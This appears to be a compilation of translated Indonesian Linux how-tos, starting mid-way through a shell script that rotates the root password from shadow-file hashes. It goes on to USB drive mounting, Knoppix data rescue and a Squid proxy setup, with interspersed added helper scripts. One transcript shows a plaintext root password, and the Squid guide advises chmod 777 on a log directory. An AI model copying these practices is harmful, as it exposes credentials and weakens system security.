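    if printf '%s' "$h" | grep -Eq "$HASH_RE"; then
        printf '%s\n' "$h"
    else
        echo "no usable root hash in $1 (empty, placeholder or malformed)" >&2
        return 1
    fi
}

# rotate_command DIR MINUTE COUNT: prints the usermod call for this slot,
# or returns 1 and prints nothing when the slot's file fails the check
rotate_command() {
    slot=$(slot_for_minute "$2" "$3")
    h=$(root_hash "$1/shadow$slot") || return 1
    printf "usermod -p '%s' root\n" "$h"
}

# Constructed sample data: shadow0 holds a made-up MD5-crypt style entry,
# shadow1 is empty, which is what a failed grep redirect leaves behind.
demo_dir=$(mktemp -d)
printf '%s\n' 'root:$1$cnstrctd$0123456789abcdefghijkl:12678:0:::::' \
    > "$demo_dir/shadow0"
: > "$demo_dir/shadow1"
rotate_command "$demo_dir" 00 6
rotate_command "$demo_dir" 05 6 || echo "slot 1 rejected, root password left unchanged"
rm -rf "$demo_dir"
```

With this check in place a single crontab entry can replace the twelve lines, and a bad backup file skips one rotation instead of changing the root entry.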

Do not forget the passwords ^_^

Good luck, greetings from Medan City

5. References

1. cut manual page
2. crond manual page
3. crontab manual page
4. usermod manual page

USB Flash Drives on Linux

A flashdisk, or USB flash drive as people call it, is a small portable data storage device that can be used on every OS, Linux included. Enabling it is quite easy: the only requirement is a kernel that supports USB, and normally every distro qualifies (the default kernel already supports USB).

1. Check the USB modules
Check whether the USB modules are loaded:
type lsmod | grep usb; lsmod | grep ehci
If they are loaded you will see roughly this:



dihack@idban:~> lsmod | grep usb; lsmod | grep ehci
usb-storage 71168 0
scsi_mod 97248 5 [sd_mod st sr_mod sg usb-storage]
usb-uhci 23888 0 (unused)
usbcore 64844 1 [usb-storage usb-uhci ehci-hcd]
ehci-hcd 18284 0 (unused)
usbcore 64844 1 [usb-storage usb-uhci ehci-hcd]


Note: ignore the numbers and look at the module names such as usb-storage, scsi_mod and so on. Also remember to load the vfat or fat module, because the partition type used on flash drives is usually FAT16.

2. Load the USB modules
If those modules are not loaded, load them one by one with the command: modprobe module_name
for example modprobe usb-storage

3. Plug in and check the flash drive
Once everything is loaded, plug the flash drive into a USB port, then run dmesg to see what happens

dihack@idban:> dmesg
.....skipped
hub.c: new USB device 00:1d.7-3, assigned address 7
WARNING: USB Mass Storage data integrity not assured
USB Mass Storage device found at 7
SCSI device sda: 251904 512-byte hdwr sectors (129 MB)
sda: Write Protect is off
sda: sda4


The example above shows a flash drive detected by Linux as the first SCSI disk (sda); this can differ from computer to computer.

4. Check the flash drive's partition type
Next check the partition type of the flash drive with:
sfdisk -l /dev/sda

idban:/root # /sbin/sfdisk -l /dev/sda

Disk /dev/sda: 246 cylinders, 32 heads, 32 sectors/track
Units = cylinders of 524288 bytes, blocks of 1024 bytes, counting from 0

Device Boot Start End #cyls #blocks Id System
/dev/sda1 0 - 0 0 0 Empty
/dev/sda2 0 - 0 0 0 Empty
/dev/sda3 0 - 0 0 0 Empty
/dev/sda4 * 0+ 245 246- 125936 6 FAT16


Here you can see that the flash drive on sda uses FAT16.

5. Edit /etc/fstab
Now that we know the partition type, create the directory where the flash drive will be mounted,
for example /mnt/flashdisk, with the command mkdir /mnt/flashdisk
Then add:

/dev/sda4 /mnt/flashdisk vfat sync,noauto,user,exec 0 0

or:

/dev/sda4 /mnt/flashdisk auto sync,noauto,user,exec 0 0

to /etc/fstab

6. Mounting
Once all of that is in place, the flash drive can be mounted with the command

mount /dev/sda4

or

mount /mnt/flashdisk



NOTE
Steps 2, 4 and 5 require root access.
==============================================================

Automatic mounting with autofs

For automatic mounting you can use autofs/automount. On Red Hat just edit /etc/auto.master and uncomment the last line

/misc /etc/auto.misc --timeout=60

then also edit /etc/auto.misc and add the line

usbdisk -fstype=vfat,sync,umask=000,uid=500,gid=500 :/dev/sda1

The name is up to you, it can be "usbdisk" or "unyil", whatever...

Then start the autofs service (you can make it start automatically at boot, if it does not already). After that, automount will mount the device at /misc/usbdisk whenever you access that path (for example with nautilus or 'cd' from the shell). Tip: watch /var/log/messages while you do this to understand the sequence from plugging in the USB device to the mount.


Last edited on Tuesday, March 16, 2004 2:09:08 pm.

External USB HDD on Linux

writer:
Iman Rahmadsyah Harahap / a_ir_hrp (shakysonyo@hotpop.com)

An external USB HDD is a mobile device like a flash drive that can hold large amounts of data, with capacities measured in gigabytes, and it can be used on Linux.
This device is a solution for anyone short on hard disk capacity, whether on a notebook or a PC, or simply as a data backup.

There are many kinds of external USB devices, but the two common categories go by hard drive size: PC HDD (with power adapter) and notebook HDD (without power adapter). Usually the enclosure and the HDD are sold separately.

1. Preparing the hardware
- Check the jumper; it is up to you whether to set it as primary, secondary or something else ( I prefer primary.... :-p )
- Attach the data cable and the power cable to the HDD.
- Do not forget to screw the HDD into the enclosure.
- Now put its clothes on... oops... wrong... fit the enclosure cover on the HDD and do not forget the screws again ... :D



2. Preparing the modules
- Go and read Idban's article again ...
- Just to recap (sorry Idban... I am borrowing a little): are your USB modules loaded?
you can check by running the following command,




sysadmin@iman$ lsmod |grep usb; lsmod |grep ehci
usb_storage 30464 2
usbcore 117092 5 ehci_hcd,usb_storage,uhci_hcd
ehci_hcd 31108 0
usbcore 117092 5 ehci_hcd,usb_storage,uhci_hcd

-

- If the modules show up as above, you can relax a little for now ...
- If they do not, load the modules... oops, do not forget to log in as root.....

-

sysadmin@iman$ /bin/su -
Password:akusayangmama_:-p
root@iman# modprobe usb_storage
root@iman# modprobe usbcore
root@iman# modprobe uhci_hcd
root@iman# modprobe ehci_hcd

-

- If the commands above print "FATAL: Module module_name not found."
check your kernel config, enable the USB support modules, then compile the modules :-(



3. First touch and checking the connection (not the network, mind you.... !!)
- Say a prayer ... hopefully it works ...
- Run some electricity through its body ... why body... sorry.. switch on the power of the external USB HDD :D
- Is it on? Steady your breathing... now... insert it slowly but surely... into that hole, you know... (Careful... no dirty thoughts !! )
- Now check whether it has been detected or not (moments full of anxiety)

root@iman# dmesg
usb 1-1: new full speed USB device using address 3
scsi1 : SCSI emulation for USB Mass Storage devices
Vendor: Maxtor 6 Model: Y080L0 Rev: 0 0
Type: Direct-Access ANSI SCSI revision: 02
SCSI device sda: 160086528 512-byte hdwr sectors (81964 MB)
sda: assuming drive cache: write through
/dev/scsi/host1/bus0/target0/lun0: p1 p2 p3 < p5 p6 >
Attached scsi disk sda at scsi1, channel 0, id 0, lun 0
Attached scsi generic sg0 at scsi1, channel 0, id 0, lun 0, type 0
USB Mass Storage device found at 3



- **phew ...** (sighs) ... it was detected after all... :-D
- Your external HDD is now known as sda ^_^





4. Partitioning and formatting
- Run fdisk /dev/sda, then partition the disk to suit your needs.
Here I split it into 4 partitions: 2 with ext3 and 2 as vfat.

root@iman# fdisk /dev/sda
Device Boot Start End Blocks Id System
/dev/sda1 1 2615 21004956 83 Linux
/dev/sda2 2616 5230 21004987+ 83 Linux
/dev/sda3 5231 9964 38025855 5 Extended
/dev/sda5 5231 7845 21004956 b W95 FAT32
/dev/sda6 7846 9964 17020836 b W95 FAT32



- Once the partitions have been created and given their types ... exit, shoo... shoo .. shoo... :D
- Time to format the partitions (note which sda numbers are your Linux partitions)

root@iman# mkfs.ext3 /dev/sda1
mke2fs 1.35 (28-Feb-2004)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
2627520 inodes, 5251246 blocks
262562 blocks (5.00%) reserved for the super user
First data block=0
161 block groups
32768 blocks per group, 32768 fragments per group
16320 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000
Writing inode tables: done
Creating journal (8192 blocks): done
Writing superblocks and filesystem accounting information: done
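
An added example (not part of the original article): a small shell helper that reads an fdisk partition listing like the one above and prints only the partitions whose Id is 83 (Linux), so that mkfs.ext3 is pointed at those and never at the extended or FAT32 entries. The function names and the embedded sample table are assumptions made for the illustration.

```bash
#!/bin/bash
# Constructed sample: the partition table printed by fdisk in the article.
SAMPLE_TABLE='Device Boot Start End Blocks Id System
/dev/sda1 1 2615 21004956 83 Linux
/dev/sda2 2616 5230 21004987+ 83 Linux
/dev/sda3 5231 9964 38025855 5 Extended
/dev/sda5 5231 7845 21004956 b W95 FAT32
/dev/sda6 7846 9964 17020836 b W95 FAT32'

# partitions_with_id ID: read an fdisk listing on stdin and print the device
# names whose partition type Id equals ID (hex, as fdisk prints it).
partitions_with_id() {
    awk -v want="$1" '
        $1 !~ /^\/dev\// { next }      # skip the header and any other text
        {
            i = 2
            if ($i == "*") i++         # optional bootable flag column
            id = $(i + 3)              # columns after it: Start End Blocks Id
            if (tolower(id) == tolower(want)) print $1
        }'
}

# format_plan: print (without running) the mkfs commands for the Linux
# partitions only, so the list can be reviewed before anything is erased.
format_plan() {
    partitions_with_id 83 | while read -r dev; do
        echo "mkfs.ext3 $dev"
    done
}

printf '%s\n' "$SAMPLE_TABLE" | format_plan
```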

5. Mounting the partitions
- Create the directories where the partitions of your external HDD will be mounted, then mount the partitions

root@iman# mkdir /mnt/sda1
root@iman# mkdir /mnt/sda2
root@iman# mount /dev/sda1 /mnt/sda1
root@iman# mount /dev/sda2 /mnt/sda2



- Do you want these partitions to be mounted automatically at boot or when the drive is plugged in?
Go and read mas Idban's article again ... OK.... :D
- Do not shake the HDD too much while it is running...!!!

- Greetings from Medan


6. References
Flashdisk - Idban Secandri
Man fdisk
Man mount
Man lsmod
Man modprobe
Man mkfs.ext3
Man Iman himself, a_ir_hrp .... hehehehe :D

GOOD LUCK TRYING IT OUT

Greetings from Medan City .....

-------------------------------------------------------------------------------------------
<<--I.R-Harahap-Medan -->>
I am not someone who feels clever :-(
I always consider myself someone who is lacking :-(
It is because of that lack that I want to learn, so that I can become clever ^_^
-------------------------------------------------------------------------------------------
- a_ir_hrp
- 081-361-305-777
- Feb, 15 1981
- My site http://iman.medanlinux.com
- I am just an ordinary human being
Using this device is very easy, just like using a flash disk..... (Ref.: read mas Idban Secandri's article on flash disks)
NB. 1. It is assumed that the HDD is still a virgin ... eeehhh.... wrong.. sorry.. has not yet been partitioned or formatted .. :D
2. The HDD used is an ordinary PC HDD, a Maxtor 80 GB 7200 rpm.
3. Tested in a very sad place on a Slackware 10 machine - kernel-2.6.8 :-(

Rescuing data on Windows XP with Knoppix Linux

Computer technology keeps advancing almost without our noticing, and the number of operating systems keeps growing too: DOS, Windows 9x, Windows NT, Windows XP, OS/2, MacOS, Unix, Linux. Linux currently has a great many developers; the site www.distrowatch.com lists more than 100 distros, including Red Hat, Fedora, SUSE, Mandrake and Debian. In the latest development among Linux distros, an alternative to installing on a PC hard disk is attracting a lot of attention: the Linux live CD. With a Linux live CD we can use Linux without having to install it. Just put it in the CD-ROM drive and boot from the CD... and you are using Linux. The pioneer of Linux live CDs, Knoppix, was created by Klaus Knopper from Germany, http://www.knoppix.net. Getting Knoppix is also very easy: download it from www.knoppix.net or from its mirror at http://kambing.vlsm.org/debian-cd/knoppix/, or buy it at a CD shop, or buy InfoLinux.

Many of us still use Windows at home, at the office or in internet cafes, regardless of whether that Windows is pirated or not. At some point Windows can crash, become corrupt or fail to boot, and only then does the headache of rescuing the data begin. For Windows 95, Windows 98 and Windows ME we can still use a DOS boot diskette and read the contents of the drive, because they use the FAT file system, which DOS can read. Windows NT, 2000 and XP, on the other hand, cannot be read from a DOS diskette if they use the NTFS file system. So rescuing a system or data on an NTFS file system is fairly difficult, especially if Windows gives us no chance to get to a console or to the desktop.

One easy way to rescue the data is to use a Linux live CD such as the Knoppix CD. Once Knoppix is running we can back up the data to a file server or to someone else's computer, and meanwhile we are free to tinker with the Windows installation. Below are the steps, one by one, to rescue Windows XP with Knoppix Linux.

Make the computer able to boot from CD: enter the BIOS at boot time by pressing "del" (on notebooks usually F2) and look for the boot sequence, usually in the advanced section (AMI and Award BIOS, except on Intel boards). Set the first boot device to CD.

Put the Knoppix CD in the CD-ROM drive.

Wait about 5 minutes and you will arrive at the Knoppix Linux desktop. If that fails, press F2 at the lilo (Linux boot loader) prompt to get to the boot options. If the VGA card is not supported or there is not enough memory, try text mode with the boot option "knoppix 2".

Once on the Linux desktop, go to the menu Knoppix -> Network -> network configuration. If the network uses DHCP, press OK. If not, press No, then enter the IP address, DNS and gateway (the IP address is the most important one). Or, if you cannot get to the desktop, boot into text mode, type "netcardconfig" at the console, then enter the IP address and try to ping a friend's computer or the server.

Browse the shares of a computer on the network with the command "smbclient -L nama-komputer" (nama-komputer is the computer name); if it asks for a password, just press Enter (if we are sure that the sharing computer has no password set). Create a mount directory for the Samba share with "mkdir /mnt/samba-share". Then open the network share that will hold the backup with the command "smbmount //nama-komputer/nama-share /mnt/samba-share" (nama-share is the share name); if the share is password-protected, add the options "username=***" "password=***".

Mount the local hard disk with the command "mount /mnt/hda1" (primary master, first partition) or "mount /mnt/hda5" (primary master, first logical partition).

Open mc (Midnight Commander) with the command "mc"; it is very similar to the Norton Commander of the old DOS days. Open /mnt/hda1 in the left panel and /mnt/samba-share in the right panel. Select the files you want to back up with "Insert" and copy them with "F5" (uncheck "preserve Attributes" so that the attributes of the backed-up files are not changed). If there is an FTP server you can use "FTP link"; for example, to back up to the FTP server "ftp.server.co.id" with user=gue password=passgue into the directory pub/backup, go to the menu Right -> FTP link, and in the FTP to machine dialog that appears (press F1 to see examples) type /#ftp:gue:passgue@ftp.server.co.id/pub/backup.

After the files have been backed up we can tinker with Windows XP. Formatting it, if necessary, is fine too; our important files are safe.
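
An added example, not from the original article: before the Windows installation is modified or formatted, the copy on the share can be checked against the source by comparing SHA-256 manifests. Only file contents are compared, which suits a copy made without preserved attributes. The function names and demo paths are illustrative, and sha256sum plus GNU find/sort/xargs are assumed to be available on the rescue system.

```bash
#!/bin/bash
# manifest DIR: print "sha256  ./relative/path" for every regular file under
# DIR, sorted by path. Fails if any file cannot be read.
manifest() {
    ( cd "$1" && find . -type f -print0 | sort -z | xargs -0 -r sha256sum )
}

# verify_copy SRC DST: succeed only if every file under SRC exists under DST
# with identical contents. Returns 1 and prints the affected source entries
# if something is missing or differs, 2 if a tree could not be read.
verify_copy() {
    tmp=$(mktemp -d) || return 2
    manifest "$1" > "$tmp/src" || { rm -rf "$tmp"; return 2; }
    manifest "$2" > "$tmp/dst" || { rm -rf "$tmp"; return 2; }
    # Source lines with no identical line in the destination manifest are
    # files that are absent there or whose contents differ.
    if grep -Fvx -f "$tmp/dst" "$tmp/src" > "$tmp/bad"; then
        cat "$tmp/bad"
        rm -rf "$tmp"
        return 1
    fi
    rm -rf "$tmp"
    return 0
}

# Constructed demonstration on temporary trees. On the rescue system the call
# would look like: verify_copy /mnt/hda1/data /mnt/samba-share/data
# (the subdirectory name "data" is illustrative).
work=$(mktemp -d)
mkdir -p "$work/hda1/docs" "$work/share/docs"
printf 'quarterly report\n' > "$work/hda1/docs/report.txt"
cp "$work/hda1/docs/report.txt" "$work/share/docs/report.txt"
printf 'address book\n' > "$work/hda1/contacts.csv"   # not copied yet
if verify_copy "$work/hda1" "$work/share"; then
    echo "copy verified"
else
    echo "copy incomplete: leave the source disk untouched"
fi
rm -rf "$work"
```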

A final note: other Linux live CDs can be used as well, for example Mandrake-Move (no mc), Slax, Gnoppix, suse-livecd and so on, or a USB flash distro such as RUNT if the computer can boot from USB. In Knoppix versions 3.1 and 3.2, mc tends to fail when copying many files, so use version 3.3, 3.4 or the latest, 3.7.

Knoppix Linux opens NTFS partitions read-only, while FAT can be opened read-write. Linux with a 2.6 kernel can open NTFS read-write, but on the Knoppix live CD it does not seem to be possible yet (I do not know for sure).

Kurniadi (kurniadi@patrakom.co.id)

Installing Squid, Banner Filter, Porn Filter, Bandwidth Limiting, Transparent Proxy

Before installing, it is a good idea to get a pack of cigarettes (A Mild) and some snacks ready :) . This document is intended to help you build a proxy server. The operating system used is Red Hat Linux 7.2. All the packages are in source tarball format. There is no copyright of any kind on this document; you are free to copy, print or modify it (while crediting the original author). Suggestions, corrections, criticism, typos or greetings can be sent to the email address above. I hope it is useful and advances open source software in Indonesia.

Make sure you are logged in to your server as root

1. Installing Banner Filter
The Banner Filter directory must be placed inside our www directory, in my case /usr/local/apache/htdocs. Download the Banner Filter source from http://phroggy.com/files/unix/bannerfilter-1.21.tar.gz

[root@PROXY hanny]# wget http://phroggy.com/files/unix/bannerfilter-1.21.tar.gz

Extract the bannerfilter-1.21.tar.gz source:
[root@PROXY hanny]# tar -xzvf bannerfilter-1.21.tar.gz

Then move the extracted bannerfilter-1.21 directory into /usr/local/apache/htdocs
[root@PROXY hanny]# mv bannerfilter-1.21 /usr/local/apache/htdocs/bannerfilter
[root@PROXY hanny]# cd /usr/local/apache/htdocs/bannerfilter

Edit the bannerfilter.conf file
[root@PROXY bannerfilter]# mv bannerfilter.conf /etc
[root@PROXY bannerfilter]# vi /etc/bannerfilter.conf

Example contents of my bannerfilter.conf:
# Path to the directory containing the data files:
$DATA='/usr/local/apache/htdocs/bannerfilter';

# URL of the directory containing the HTML and graphics files
# (this must be accessible by the machine running Squid; it does
# not need to be accessible to the client machines):
$WWW='http://www.rsds.or.id/bannerfilter/www';

# Path to the banner log file if you want one, or leave empty (if
# specified, Squid must have write access to this file):
$LOG='';

# $LOG='/tmp/bannerlog.txt';
# If you prefer not to see "Blocked", use null.gif instead of
# banner.gif:
$BANNERGIF='banner.gif';

The bannerfilter line will later be added to squid.conf:
redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl


2. Installing Squid
Before installing Squid, make sure the stock Squid daemon that ships with Red Hat is stopped or wiped out !!
Here is how:
[root@PROXY hanny]# /etc/rc.d/init.d/squid stop
[root@PROXY hanny]# for a in `rpm -qa | grep squid`; do rpm -e --nodeps $a; done

Now we download the Squid source. I use squid-2.5.STABLE2
Download the Squid source from http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE2.tar.gz

[root@PROXY hanny]# wget http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE2.tar.gz

Extract the squid-2.5.STABLE2.tar.gz source:
[root@PROXY hanny]# tar -xzvf squid-2.5.STABLE2.tar.gz
[root@PROXY hanny]# cd squid-2.5.STABLE2

Create a user to run Squid; the user name is squid
To improve the security of our server, the squid user cannot be used to log in
[root@PROXY squid-2.5.STABLE2]# useradd -d /usr/local/squid/ -r -s /dev/null squid > /dev/null 2>&1

Compile and install Squid:
[root@PROXY squid-2.5.STABLE2]# ./configure --prefix=/usr/local/squid --exec-prefix=/usr/local/squid \
> --enable-delay-pools --enable-cache-digests --enable-poll \
> --disable-ident-lookups --enable-async-io=16 \
> --enable-auth-modules --enable-removal-policies --enable-snmp

[root@PROXY squid-2.5.STABLE2]# make all
The make all step usually takes a long time, so it is a good idea to take a cigarette and light it :) how beautiful this world is !!

[root@PROXY squid-2.5.STABLE2]# make install

Now we move on to editing the configuration in the squid.conf file
[root@PROXY squid-2.5.STABLE2]# cd /usr/local/squid/etc

You can first read http://www.squid-cache.org/Doc/FAQ/FAQ.html (take another cigarette to ease your tension !!)
When editing the Squid configuration, you can read the readme text that is already inside squid.conf, or you can look at or fetch the file I have already edited, http://www.rsds.or.id/linux/squid.conf.hanny

[root@PROXY etc]# wget http://www.rsds.or.id/linux/squid.conf.hanny
[root@PROXY etc]# vi squid.conf.hanny

Then look in squid.conf.hanny for the entries listed below, which are printed in bold italic:
ftp_user name@domain-anda.com
dns_nameservers IP-Address-DNS-ISP-Anda
acl user src 192.168.0.0/255.255.255.0
(192.168.0.0 is the IP address range of our clients, from 192.168.0.0 to 192.168.0.255)

In squid.conf.hanny I have already added the lines that run Banner Filter and Porn Filter:
redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
acl porn url_regex "/usr/local/squid/etc/porn.txt"
http_access deny porn

If you do not want Banner Filter or Porn Filter to run, put a " # " at the start of the Banner Filter or Porn Filter lines in squid.conf.hanny:
#redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
#acl porn url_regex "/usr/local/squid/etc/porn.txt"
#http_access deny porn


3. Bandwidth Limiting
In squid.conf.hanny I have also added the lines for using delay pools:

#------------------------ DELAY POOL CONFIGURATION (HANNY) ---------------------------
#This is the most important part for shaping incoming traffic with Squid
#For detailed description see squid.conf file or docs at http://www.squid-cache.org
#We don't want to limit downloads on our local network
acl magic_words1 url_regex -i 192.168.
#We want to limit downloads of these type of files
#Put this all in one line
acl magic_words2 url_regex -i ftp .exe .mp3 .vqf .tar.gz .gz .rpm .zip .rar .avi .mpeg .mpe .mpg .qt .ram .rm .iso .raw .wav
#We don't block .html, .gif, .jpg and similar files, because they
#generally don't consume much bandwidth
#We have two different delay_pools
delay_pools 2
#First delay pool
#We don't want to delay our local traffic
#There are three pool classes; here we will deal only with the second
delay_class 1 2
#-1/-1 mean that there are no limits
delay_parameters 1 -1/-1 -1/-1
#magic_words1: 192.168
delay_access 1 allow magic_words1
#Second delay pool
#we want to delay downloading files mentioned in magic_words2
delay_class 2 2
#The numbers here are values in bytes;
#we must remember that Squid doesn't consider start/stop bits
#5000/150000 are values for the whole network
#5000/120000 are values for the single IP
#after downloaded files exceed about 150000 bytes,
#(or even twice or three times as much)
#they will continue to download at about 5000 bytes/s
delay_parameters 2 5000/150000 5000/120000
delay_access 2 allow magic_words2
#--------------------------------------------------------------------------------

If you do not want bandwidth limiting to run, put a " # " at the start of the delay pool lines in squid.conf.hanny:
#------------------------ DELAY POOL CONFIGURATION (HANNY) ---------------------------
#This is the most important part for shaping incoming traffic with Squid
#For detailed description see squid.conf file or docs at http://www.squid-cache.org
#We don't want to limit downloads on our local network
#acl magic_words1 url_regex -i 192.168.
#We want to limit downloads of these type of files
#Put this all in one line
acl magic_words2 url_regex -i ftp .exe .mp3 .vqf .tar.gz .gz .rpm .zip .rar .avi .mpeg .mpe .mpg .qt .ram .rm .iso .raw .wav
#We don't block .html, .gif, .jpg and similar files, because they
#generally don't consume much bandwidth
#We have two different delay_pools
#delay_pools 2
#First delay pool
#We don't want to delay our local traffic
#There are three pool classes; here we will deal only with the second
#delay_class 1 2
#-1/-1 mean that there are no limits
#delay_parameters 1 -1/-1 -1/-1
#magic_words1: 192.168
#delay_access 1 allow magic_words1
#Second delay pool
#we want to delay downloading files mentioned in magic_words2
#delay_class 2 2
#The numbers here are values in bytes;
#we must remember that Squid doesn't consider start/stop bits
#5000/150000 are values for the whole network
#5000/120000 are values for the single IP
#after downloaded files exceed about 150000 bytes,
#(or even twice or three times as much)
#they will continue to download at about 5000 bytes/s
#delay_parameters 2 5000/150000 5000/120000
#delay_access 2 allow magic_words2
#--------------------------------------------------------------------------------

Rename the original squid.conf on your computer to another file name (as a backup)
and rename squid.conf.hanny to squid.conf
[root@PROXY etc]# mv squid.conf squid.conf.punyaku
[root@PROXY etc]# mv squid.conf.hanny squid.conf


4. Installing Porn Filter
First create a file named porn.txt
[root@PROXY etc]# touch porn.txt

Fill porn.txt with the sites you want to block, for example www.17tahun.com
[root@PROXY etc]# vi porn.txt
enter the word 17tahun
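
An added example (not part of the original tutorial) for the url_regex ACLs used by the porn filter and by magic_words1/magic_words2: the patterns are unanchored regular expressions in which "." matches any character, so they can match URLs they were not written for. The sketch approximates url_regex -i with grep -Ei (an assumption about Squid's matching) on constructed URLs and compares the page's patterns with anchored, escaped variants that are suggestions made here, not lines from squid.conf.hanny.

```bash
#!/bin/bash
# acl_matches URL PATTERN...: succeed if any pattern matches URL the way
# "acl NAME url_regex -i PATTERN..." is assumed to: case-insensitive,
# unanchored extended regular expressions.
acl_matches() {
    url=$1; shift
    for pat in "$@"; do
        printf '%s\n' "$url" | grep -Eiq -- "$pat" && return 0
    done
    return 1
}

# ACL patterns as written in the tutorial.
page_local() { acl_matches "$1" '192.168.'; }
page_files() { acl_matches "$1" 'ftp' '.exe' '.mp3' '.vqf' '.tar.gz' '.gz' \
    '.rpm' '.zip' '.rar' '.avi' '.mpeg' '.mpe' '.mpg' '.qt' '.ram' '.rm' \
    '.iso' '.raw' '.wav'; }
page_porn()  { acl_matches "$1" '17tahun'; }

# Tightened variants (suggested here): dots are escaped and every pattern is
# anchored to the scheme, the host part or the end of the URL.
strict_local() { acl_matches "$1" '^[a-z]+://192\.168\.[0-9]+\.[0-9]+([:/]|$)'; }
strict_files() { acl_matches "$1" '^ftp://' \
    '\.(exe|mp3|vqf|gz|rpm|zip|rar|avi|mpeg|mpe|mpg|qt|ram|rm|iso|raw|wav)(\?.*)?$'; }
strict_porn()  { acl_matches "$1" '^https?://([^/]*\.)?17tahun\.com(:[0-9]+)?(/|$)'; }

# compare NAME URL: show how the page pattern and the strict one classify URL.
compare() {
    if "page_$1" "$2"; then p=match; else p=-; fi
    if "strict_$1" "$2"; then s=match; else s=-; fi
    printf '%-6s page=%-6s strict=%-6s %s\n' "$1" "$p" "$s" "$2"
}

# Constructed URLs: the first of each pair is an unintended match.
compare files 'http://www.example.com/order/form.html'       # ".rm" hits "orm"
compare files 'http://downloads.example.com/tool.exe'
compare local 'http://www.example.com/img/1920168x1080.jpg'  # dots match 0, x
compare local 'http://192.168.0.10/intranet/'
compare porn  'http://news.example.com/search?q=17tahun'     # word in a query
compare porn  'http://www.17tahun.com/'
```

Squid also provides the dst and dstdomain ACL types, which match the destination address or host name directly and avoid regular expressions for the local-network and blocked-site cases.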


Running Squid
Give the squid user ownership of the squid and bannerfilter directories so that everything runs smoothly:
[root@PROXY etc]# chown -R squid.squid /usr/local/squid
[root@PROXY etc]# chown -R squid.squid /usr/local/apache/htdocs/bannerfilter

First activate your Squid cache:
[root@PROXY etc]# /usr/local/squid/sbin/squid -z

If permission denied appears while the cache is being created, first check the owner and permissions of the cache directory:
[root@PROXY etc]# chmod 777 /usr/local/squid/var/logs/
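
An added check, not part of the original tutorial: because /usr/local/squid was already handed to the squid user with chown -R, the log directory normally only has to be writable by its owner, whereas mode 777 lets every local account create, rename and delete files in it. The helpers below (hypothetical names) report world-writable or foreign-owned entries under a tree and apply the narrower mode 750; the demo runs on a constructed temporary tree, not on the real Squid paths.

```bash
#!/bin/bash
# world_writable DIR: list entries under DIR that any local user may write to.
world_writable() {
    find "$1" ! -type l -perm -0002 -print
}

# not_owned_by DIR USER: list entries under DIR that do not belong to USER
# (a user name or a numeric uid).
not_owned_by() {
    find "$1" ! -user "$2" -print
}

# audit_tree DIR USER: succeed only if everything under DIR belongs to USER
# and nothing is world-writable; otherwise print what was found.
audit_tree() {
    status=0
    ww=$(world_writable "$1")
    foreign=$(not_owned_by "$1" "$2")
    if [ -n "$ww" ]; then
        printf 'world-writable:\n%s\n' "$ww"
        status=1
    fi
    if [ -n "$foreign" ]; then
        printf 'not owned by %s:\n%s\n' "$2" "$foreign"
        status=1
    fi
    return $status
}

# owner_only DIR: keep full access for the owner, read-only access for the
# group and none for others (750 on directories, 640 on plain files).
owner_only() {
    chmod -R u+rwX,g-w,o-rwx "$1"
}

# Constructed demonstration; on the proxy the equivalent call would be
#   audit_tree /usr/local/squid squid
demo=$(mktemp -d)
mkdir -p "$demo/var/logs"
: > "$demo/var/logs/access.log"
chmod 777 "$demo/var/logs"                 # the mode used in the tutorial
audit_tree "$demo" "$(id -u)" || echo "-> needs tightening"
owner_only "$demo"
audit_tree "$demo" "$(id -u)" && echo "-> clean, owner can still write"
rm -rf "$demo"
```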

If there are any error messages up to this stage, please email hanny@rsds.or.id

Start your Squid daemon:
[root@PROXY etc]# /usr/local/squid/sbin/squid

Check whether your Squid is running or not:
[root@PROXY etc]# netstat -pln | grep squid
tcp 0 0 0.0.0.0 :8080 0.0.0.0:* LISTEN 777/(squid)
udp 0 0 0.0.0.0 :32771 0.0.0.0:* 777/(squid)
udp 0 0 0.0.0.0 :3130 0.0.0.0:* 777/(squid)

If the output looks like the above, your Squid is running !! time for a smoke first...: )


Testing Squid from a client computer
Run a ping test across your network; for example, your server has IP 192.168.0.1 and your Windows client has IP 192.168.0.2:
[root@PROXY etc]# ping 192.168.0.2
PING 192.168.0.2 (192.168.0.2) from 192.168.0.1 : 56(84) bytes of data.
Warning: time of day goes back, taking countermeasures.
64 bytes from 192.168.0.2: icmp_seq=0 ttl=255 time=233 usec
64 bytes from 192.168.0.2: icmp_seq=1 ttl=255 time=161 usec

If you have a client running Windows 98, Windows ME or Windows XP, set the proxy in Internet Explorer to your server's IP and port 8080 (for example, my server IP is 192.168.0.1, so the proxy setting is 192.168.0.1 : 8080)

Try opening the following sites, each in a new Internet Explorer window:
http://www.yahoo.com , http://www.17tahun.com , http://zdads.e-media.com

1. If http://www.yahoo.com opens, your Squid setup is working properly up to this stage.

2. If http://www.17tahun.com does not open and only shows ACCESS DENIED, your Porn Filter is working properly. You can add more sites that you want to block by editing porn.txt again
[root@PROXY hanny]# vi /usr/local/squid/etc/porn.txt

3. If http://zdads.e-media.com does not open and only shows a BLOCKED AREA image, your Banner Filter is working properly.


5. Transparent Proxy
To make things easier we will use iptables
[root@PROXY hanny]# /sbin/iptables -F -t nat
[root@PROXY hanny]# /sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -s 192.168.0.0/255.255.255.0 \
> --dport 80 -j DNAT --to 192.168.0.1:8080

Notes on the iptables rule above:
1. eth1 is the LAN card interface that holds the clients' gateway IP.
2. 192.168.0.0/255.255.255.0 is our client IP range, from 192.168.0.0 to 192.168.0.255.
3. --dport 80 -j DNAT --to 192.168.0.1:8080 means that any request to port 80 (usually browsing) is forced into Squid at IP 192.168.0.1 port 8080.

If you have a client running Windows 98, Windows ME or Windows XP, make sure that no proxy is set in Internet Explorer. And make sure that the client IP and the client's gateway IP are filled in correctly !!!
(For example, my client has IP 192.168.0.2 and gateway IP 192.168.0.1)

Try opening the following sites, each in a new Internet Explorer window:
http://www.yahoo.com , http://www.17tahun.com , http://zdads.e-media.com

1. If http://www.yahoo.com opens, your Squid setup is working properly up to this stage.

